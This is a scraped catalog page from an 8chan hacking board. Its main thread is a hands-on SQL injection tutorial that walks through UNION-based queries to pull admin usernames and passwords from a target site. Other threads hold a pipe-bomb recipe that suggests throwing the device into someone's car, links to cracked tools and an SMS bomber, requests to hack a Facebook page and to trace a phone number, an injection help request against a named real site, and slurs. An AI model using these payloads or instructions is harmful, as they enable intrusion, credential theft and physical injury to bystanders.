Catalog (/hf/)

R: 7 / I: 0 / P: 1

/hf/ - SQLi (part 1)

SQL injection is a code injection technique, in which malicious SQL statements are inserted into an entry field for execution.
What you'll need -

*A list of dorks, I got these for you:
http://www.mediafire.com/download/lzy8cjo52xct1m4/Dorks.txt

*A functioning brain (50% of you can stop reading here)

We'll be covering manual and blind SQLi injection, No Havij.


Step №1 - Check for vulnerability
You can either use a vulnerability scanner or manually check websites, it's up to you.

Using the list of dorks, find a website, let's say we found www.halfchan.org/news.php?id=4
We add an apostrophe to the end of the URL and hope it relays a SQL error back to us.

www.halfchan.org/news.php?id=4
becomes
www.halfchan.org/news.php?id=4'
An indication of a vulnerable website is a message along the lines of;
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server”

Great, halfchan is vulnerable and ready to be injected.

Step №2 - Find number of columns
Finding a number of columns is usually achieved by declaring the ORDER BY statement, we will keep constant increments until we get a relayed error

www.halfchan.org/news.php?id=4 order by 1/* <– no error
www.halfchan.org/news.php?id=4 order by 2/* <– no error
www.halfchan.org/news.php?id=4 order by 3/* <– no error
www.halfchan.org/news.php?id=4 order by 4/* <– error (we get a relayed message along the lines of Unknown column ‘4′ in ‘order clause’)
We do not count the last table because it does not exist, so we have 3 columns.

Step №3 - Discover UNION
We declare UNION statement at the end of the URL to find out which tables are vulnerable
www.halfchan.org/news.php?id=4 union all select 1,2,3/*

Step №4 - Extract SQL Version
Our UNION command told us that table 2 is vulnerable, so we will use that table to extract the version, it's important to understand that SQLi only works on MySQL versions below 5

Replace the vulnerable number table with @@version, our vulnerable table is two, so we remove the 2 from the URL and insert @@version in order to relay the MySQL version back to us

www.halfchan.org/news.php?id=4 union all select 1,@@version,3/*

In case the server does not relay the MySQL version back to you, we declare convert() function in order to bypass the error, in case it's caused by unicode issues.

www.halfchan.org/news.php?id=4 union all select 1,convert(@@version using latin1),3/*
If the server still refuses to relay the version, which probably means the charset is not set to default, we can try bypassing it with this additional syntax

www.halfchan.org/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*

At last, we have our version, it's below 5 and we can carry on.

Step №5 - Obtaining tables and columns names manually
This is a straining and boring step, which is why I recommend getting Havij to do it for you, however, the basics are important.

Common table names: user(s), admin(s), member(s) - these also happen to be the tables we will need to get some tasty information.

Common column names: username, user, usr, user_name, password, pass, passwd, pwd

Attempting to relay one of the tables is simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,2,3 from admin/*

If the table exists, relaying a column is also simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,username,3 from admin/*

This is a guessing game, so either start guessing or use Havij to guess for you.

By some miracle, we got admins table and username column right, and all the usernames are displayed:
Noot
Janitor
Janitor2
Janitor3
User
User
User
User
User

Great, now we know the halfchan's administrator username, Noot.

Getting the password depends on how the database is set up, sometimes they're unencrypted and are plain text, and sometimes they're md5 hashed, I've seen it all.

By now you should know how to maneuver around tables and columns, so we head over to the passwords column

www.halfchan.org/news.php?id=4 union all select 1,password,3 from admin/*

This usually relays a large string of confusing wall of text, it can be re-arranged to look all pretty and nice using the concat statement

www.halfchan.org/news.php?id=4 union all select 1,concat(username,0×3a,password),3 from admin/* (0×3a is a hash value for colon (:) which will separate our usernames and passwords from the admin table.)
Noot:ILoveBigCocks
Janitor:123456
Janitor2:password
Janitor3:8chanisbetter
User:41241251
And so forth.

If your keyboard has no : because you're Finnish or something, you can use ascii as well.
www.halfchan.org/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*

A last resort if you cannot guess tables or columns would be using mysql.user as default.


part 2 next reply
R: 0 / I: 0 / P: 1

Welcome to /hf/ - Hack Funk

This is an info and discussion board regarding hacking, cracking, skidding and all malicious security acts.

Discussed topics can be but not limited to:

Botnets, IRC Bots, and Zombies,

Cryptography, Encryption, and Decryption

Pentesting and Forensics,

Decompiling, Reverse Engineering, Disassembly, and Debugging,

Worms, Malware, and Viruses,

Doxing, Personal Information Masking, Databases, Anonymity.

Feel free to ask newbie or stupid questions.

Feel free to discuss anything else related.

Global Rules Enforced

Don't be dumb.

The shill project is active.

R: 0 / I: 0 / P: 1

hack a face book page

i want some one that can hack into a Facebook page and give me the info to get in to the Facebook page myself jason kenji

R: 7 / I: 1 / P: 1

Tracing a phone # (TextMe app)

Heyo /hf/,

i am having a little bit of a problem. help me trace and shut it down? it's in the TextMe app. 843-888-8602

help pls. harrassment is the reason it needs to be taken care of. don't think it's just because i want to shut it down. help IDing it?

R: 0 / I: 0 / P: 1

text me app

I have a number that is harassing me and my boyfriend I would like it to be taken down now

R: 21 / I: 0 / P: 1

This thread will be used to manipulate 8chan's Unique Users system to get this board to the top frontpage boards list, hopefully not getting us rekt by HW.

And HW, if you see this and you are upset…

"It's just a park bro"

R: 0 / I: 0 / P: 1

can u guys mess up flockdraw more

R: 0 / I: 0 / P: 1

Kik Me - Kik Bot

The newest version of this bot costs $15, what a joke, here it is for free.

Scan: https://www.virustotal.com/sv/file/e6665ed962ba950c1748e946c332b4c93fca7c38132c7b081268df311fcc5fa6/analysis/1427288237/

If you don't trust, sandboxie it.

R: 12 / I: 4 / P: 1

Leak Thread

Dumping HF product leaks here.
Steam Grinder Leak =
http://ge.tt/62LDG982/v/0?c

pass is steam11
R: 0 / I: 0 / P: 1

Leech and L33T Day - Spotify

Here's some accounts, feel free to leech, a thanks in this topic would be appreciated though.

They're unchecked, but I'm pretty sure they're all premium, if they're not, let me know and I'll post prems.

R: 7 / I: 1 / P: 1

Pyrotechnics General

How to make a pipe bomb, no gunpowder.


1) GO TO YOUR LOCAL HARDWARE STORE AND TELL THE GUY THAT IS HELPING YOU
THAT YOU WANT A PIECE OF STEEL PIPE ONE FOOT LONG. AND ALSO THAT YOU WANT
THE ENDS THREADED AND YOU ALSO WANT CAPS TO PUT ON THE END.

2) NOW GET AHOLD OF A BABYFOOD JAR. MAKE SURE THAT THE JAR WILL FIT DOWN
THE PIPE REAL EASY LIKE. FILL THE BABYJAR WITH EVERYDAY VINEGAR. MAKE
SURE THE TOP IS SCREWED ON REAL TIGHT. **IF IT IS LOOSE YOU WILL BLOW YOUR
HAND OFF**

3)NOW CAP ONE END OF YOUR PIPE WITH ONE OF THE CAPS THAT YOU SHOULD HAVE
PICKED UP WITH THE PIPE. IF YOU KNOW OF SOMEONE WITH A WIELDER, HAVE HIM
WIELD A BEAD AROUND THE THREADS AFTER YOU HAVE IT CAPPED.

4)PUT SOME SMALL SHARP ROCKS DOWN THE END OF THE PIPE AND THEN SLIDE THE
BABYJAR DOWN INSIDE SO THE GLASS END IS AGAINST THE LITTLE ROCKS. NOW
EMPTY A MEDIUM BOX OF ARM AND HAMMER BAKING SODA INTO THE PIPE. CAP THE
OTHER END OF THE PIPE AND IF YOU CAN WIELD IT, THEN GO FOR IT.
BE FUCKING CAREFUL YOU MIGHT BREAK THE JAR INSIDE AND YOU WON'T
KNOW THAT YOU BROKE IT UNTIL YOU SEE YOUR HAND FLY OFF!!!

5)NOW, WHEN YOU WANT TO BLOW SOMETHING UP, JUST SMACK THE END OF THE PIPE
THAT SENDS THE JAR INSIDE DOWN AGAINST THE SMALL ROCKS. OH YEAH, SMACK IT
AGAINST SOME CONCREAT. THIS BREAKS THE JAR AND THE VINEGAR AND BAKING
SODA MIX TOGETHER AND BUILDS UP PRESSURE. WHEN IT GETS TO THE
CRITICAL POINT….WHAMMY!!!!

**IMPORTANT**

AFTER YOU HIT THE PIPE AGAINST THE GROUND, GET THE HELL RID OF IT!!!
TOSS IT INTO SOMEONES CAR OR SOMEWHERE. SOMETIMES. IT TAKES FIVE MINUTS FOR
IT TO GO OFF, SOMETIMES TWO. BUT IT WILL GO OFF! TRUST ME!

IT CAN TAKE UP TO 5 MINUTES FOR IT TO DETONATE.
R: 1 / I: 0 / P: 1

Acunetix Web Vulnerability Scanner 10 - For Free

Here's a cracked version of one of the best Vulnerability scanners out there.

Marketed for 'securing your own website' (bullshit)

Use this to find vulnerabilities in websites you want to target.

https://mega.nz/#!gppCjAYZ!NPq23hpdswy3EMtG1OVGEvGhenEod0BcQ0K2Fx1qn1w

Run sandboxied/vmware'd if you don't trust.

R: 0 / I: 0 / P: 1

Deobfuscator for Confuser.

Here's a little gift I'd enjoy throwing at whoever passes by from time to time.

Find software obfuscated by Confuser

Use this to Deobfuscate

Publish source, acquire internet honor

VirusTotal:

https://www.virustotal.com/en/file/077d8...374643067/

Download:

https://mega.co.nz/#!xgtHXTyK!Icqh32FO8hCYBVFs0z78bR-rBFUY7OOAl4vYHdrnvlc

Run sandboxie'd if you don't trust, don't whine. :)

R: 0 / I: 0 / P: 1

Holy shit

I never knew 8chan had a HF like board.

HF oldfag (Mar 2009) here, god damnn that site has gone to pure cancer thanks to My Mum himself. Had many fun times but the last few years I left and very rarely login to get random shit like accounts or something.

R: 6 / I: 0 / P: 2

HelpMeSqlinject

Hello.

I have been looking for a weak .php site and i finally found one. http://www.blacksys.co.kr/eng/product/product.php?id=8

so, first what i did was adding an ' after id=8

then i got this error: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bsys/public_html/eng/product/product.php on line 8

And now i'm trying to see how many tables by using: order by 100/* and still getting the error. I can even add order by 1000/* and the are still showing

(yes i'm new to this and do not want to use Havij).

Any tips and tricks?
R: 7 / I: 0 / P: 2
you better watch out OP! >>>/baphomet/ will ping your IP and it'll be all over!
R: 9 / I: 1 / P: 2
8chan is great and all, but Yotsuba's user interface (especially the catalog and the mobile theme) is far superior. I am trying to implement Yotsuba's UI into infinity. Anyone interested in doing this?
R: 9 / I: 1 / P: 2
Use this shit to bomb cellphones into oblivion.
Do not test this on your own device, it will freeze and most likely brick.

https://www.dropbox.com/s/218mrp1scg5vth7/Laquisha%20SMS.exe?dl=0
R: 3 / I: 0 / P: 2
I am looking for any problems with these guides..
can /hf/ please help me?

A Basic Guide to Online Anonymity
https://paste.sh/PeHdQrTb#8Vv_ywqNsltkmlLwgTyFR2Th

Anti Forensics- Scrubbing Your Computer Clean
https://paste.sh/qA5-Dwwt#fTsHKjgELTkvNjuAsTZAIKIv
R: 0 / I: 0 / P: 2

CyberGhost Patch by PainteR

https://mega.co.nz/#!pUlBTAaJ!3zac_8mNxYrDejtfB0bX6YM88CvKNIL76HQAkrbeqQA

Have fun while it lasts!

R: 1 / I: 0 / P: 2

Halp

Reckon any of you geniuses are able to find the password to a RAR file or know how to bypass a rar's password?

Tried to download this: http://games.torrentsnack.com/neverwinter-nights-2-pc/
The fucker has a password on it that wants a survey done and since I have shitty Australian internet that means it takes me ages to download anything I would rather see if anyone here is able to find a way to avoid me downloading NWN2 another way.
R: 3 / I: 0 / P: 2

Crack+ Bruteforcing Platform

Supports multiple threads and modules.
Run in sandboxie. >>39



https://mega.co.nz/#!Qk0VWCxJ!z4uP66dy7JkfX_UWB-mMRCJwZSrgMwtdHCnWrc6mqfA
R: 7 / I: 2 / P: 2

How to avoid being swatted

The edginess of children online breaks all bounds, kids should know that swatting is a very serious offence which will get you in prison, for a long time, regardless of age.

http://www.secretsofthefed.com/15-year-old-swatted-gamer-convicted-domestic-terrorism-25-years-life-federal-prison/

http://www.nbcwashington.com/news/local/Canadian-Teen-Charged-in-Swatting-Calls-Throughout-US-258713271.html?_osource=SocialFlowTwt_DCBrand

Don't be dumb, don't swat.

In the case you feel you have a chance of being swatted, prevention is easy (considering your perpetrator is not familiar with you outside the internet)

1. Google your full name, phone number, address, online nickname, email, and look what's available.

Google is undoubtedly a powerful tool that plays a key role in doxing. Since Google indexes almost anything on the Internet (sometimes even the private information), it is possible to dox for details such as email ID, address, phone numbers and photographs of a person or company. Once you obtain the search results for your query, carefully examine the description part which in most cases contains the piece of information that you are looking for.

2. Get rid of your useless Social Network accounts, unless they contain 0 information about you.

As most Internet users are found to be active on social media, social networking sites such as Facebook and LinkedIn provide a virtual goldmine of information necessary to perform doxing. As most users are unaware of online security issues, they have weak privacy settings on their profile. This makes it easy for the attackers to gain access to personal information such as photographs, real names, location, job, partner’s name etc.

3. Remove your name from a phone registry.

A “Reverse Cell Phone Lookup” is simply a process of finding someone’s personal details such as name, age, address and related information by using their cell phone number and vice versa. There are many online services out there such as cell phone registry that provide access to the personal details about a given person based on his/her phone, name and email ID.

4. Pay an extra $x to remove your whois information from your domains.

If a person or company has a website (or domain name) associated with them, you can easily perform a “whois search” for their website to obtain personal details such as full name, address, email and phone number. Just visit whois.domaintools.com and enter the domain name for which you want to perform a whois search. It will show up all the details associated with the domain name.

EXTRA TIPS;

*Do not upload your photos on public albums, Picasa, photobucket, etc.
*If you absolutely have to use a social network, make it 100% private, Facebook has no such feature, so get rid of it.
*Create separate email IDs for individual activities such as gaming, forum participation, banking accounts etc.
R: 2 / I: 0 / P: 2

Expensive ass software.

I bought an autel maxidiag elite md802, and it included updates that only lasted a year, now they want 100USD for a new years worth of updates.
Is there a code generator for this bullshit out there already?
R: 2 / I: 0 / P: 2

I can't be the only one

Am I the only one who thinks that all these gets on half chans b are done by scriptfags with the amount of them there is no fucking way it's luck
R: 3 / I: 0 / P: 2

Groups are almost useless

the day has come where groups are ultimately useless, groups who do something besides sit on their ass and talk bullshit in their little group forum only create duplicate products with almost 0 originality, the groups lost all meaning to me
R: 0 / I: 0 / P: 2

Useful Scripts

Share your work, for whatever purpose. Try not to fill this with old, broken things that someone else wrote. Please share only your own creations.

Here's an SMS Bomber.
https://ghostbin.com/paste/sxov6/raw
R: 0 / I: 0 / P: 2

Sandboxie - The friendly guide to files on /hf/

Sandboxie is very useful to check whether or not a program is infected, you can also use it to test out your botnet. Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer. Observe pic related.

Before opening any 'mysterious' file you're unsure about, isolate it in sandboxie, or open it in a simulated OS.


http://www.sandboxie.com/index.php?DownloadSandboxie
R: 1 / I: 0 / P: 2

Proxy Dump (Proof within files)

Dumping working proxies, feel free to dump your own.

24-Jan-15
http://pastebin.com/QDmhYaVX
R: 0 / I: 0 / P: 3

Clowns

https://www.youtube.com/watch?v=epEiPmE49Fk
Mawzilla Foyerfox
R: 1 / I: 0 / P: 3
I don't understand why Overlord is so stubborn with getting some needed features, like the notice when quoted feature, we need it.
R: 0 / I: 0 / P: 3
>ITT CC's
R: 1 / I: 0 / P: 3
i enjoy omnisc1ent's sticky poops
R: 1 / I: 0 / P: 3
have a potato niggers